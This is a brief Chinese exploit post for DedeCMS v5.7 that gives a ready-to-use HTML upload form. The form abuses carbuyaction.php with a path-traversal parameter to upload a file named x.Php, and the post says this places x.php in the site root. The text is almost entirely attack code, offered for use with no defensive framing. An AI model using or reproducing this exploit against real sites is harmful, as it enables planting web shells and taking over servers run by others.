Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16
注册,登录,免邮箱验证.
up.htm
---------------------------------------------------------------------------------------------------------
<form action="http://www.xx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="x.Php"/>
<button class="button2" type="submit">提交</button><br><br>
---------------------------------------------------------------------------------------------------------
根目录生成x.php